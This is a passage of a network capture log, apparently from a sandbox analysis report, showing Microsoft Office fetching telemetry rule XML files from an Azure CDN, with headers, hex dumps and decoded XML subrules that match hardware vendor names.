                                                                                                                          ETag: "0x8DC582BB32BB5CB"
                                                                                                                          x-ms-request-id: ef3fb90e-201e-003c-18e1-3e30f9000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154330Z-174c587ffdf59vqchC1TEByk68000000069g00000000camf
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:30 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          61192.168.2.44983213.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:30 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:30 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:30 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 494
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                          ETag: "0x8DC582BB8972972"
                                                                                                                          x-ms-request-id: db42c49d-901e-007b-4a2f-3cac50000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154330Z-178bfbc474b9fdhphC1NYCac0n00000007hg00000000gvz3
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:30 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          62192.168.2.44983313.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:31 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:32 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:31 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 420
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                          ETag: "0x8DC582B9DAE3EC0"
                                                                                                                          x-ms-request-id: 2160d4c7-701e-0021-5913-3d3d45000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154331Z-178bfbc474bwlrhlhC1NYCy3kg00000007hg00000000ts8a
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:32 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          63192.168.2.44983413.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:31 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:32 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:32 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 472
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                          ETag: "0x8DC582B9D43097E"
                                                                                                                          x-ms-request-id: 3ac3f4da-f01e-001f-4c47-3c5dc8000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154332Z-15b8b599d889gj5whC1TEBfyk000000005w000000000ppsa
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:32 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          64192.168.2.44983613.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:32 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:32 UTC491INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:32 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 427
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                          ETag: "0x8DC582BA909FA21"
                                                                                                                          x-ms-request-id: 5532245b-c01e-00ad-0e6f-3da2b9000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154332Z-174c587ffdfgcs66hC1TEB69cs00000005yg00000000muqm
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:32 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          65192.168.2.44983713.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:32 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:33 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:32 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 486
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                          ETag: "0x8DC582B92FCB436"
                                                                                                                          x-ms-request-id: 444cb209-801e-00a0-5ef6-3d2196000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154332Z-178bfbc474bp8mkvhC1NYCzqnn00000007gg00000000c45u
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:33 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          66192.168.2.44983813.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:32 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:33 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:33 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 423
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                          ETag: "0x8DC582BB7564CE8"
                                                                                                                          x-ms-request-id: 79f6ed77-701e-0021-554e-3c3d45000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154333Z-15b8b599d88phfhnhC1TEBr51n000000064g00000000r62c
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:33 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          67192.168.2.44983913.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:33 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:34 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 478
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                          ETag: "0x8DC582B9B233827"
                                                                                                                          x-ms-request-id: c2388785-401e-0048-0e03-3e0409000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154334Z-178bfbc474bh5zbqhC1NYCkdug00000007mg00000000bawp
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:34 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          68192.168.2.44984013.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:34 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:34 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 404
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                          ETag: "0x8DC582B95C61A3C"
                                                                                                                          x-ms-request-id: b7a4c0f2-401e-0064-554c-3c54af000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154334Z-15b8b599d88vp97chC1TEB5pzw000000060000000000r2b9
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:34 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          69192.168.2.44984213.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:34 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:35 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:35 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 468
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                          ETag: "0x8DC582BB046B576"
                                                                                                                          x-ms-request-id: e83eb970-001e-0046-777e-3ada4b000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154335Z-174c587ffdftjz9shC1TEBsh9800000006300000000010yv
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:35 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          70192.168.2.44984313.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:34 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:35 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:35 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 400
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                          ETag: "0x8DC582BB2D62837"
                                                                                                                          x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154335Z-174c587ffdfmlsmvhC1TEBvyks000000065g00000000v9m8
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
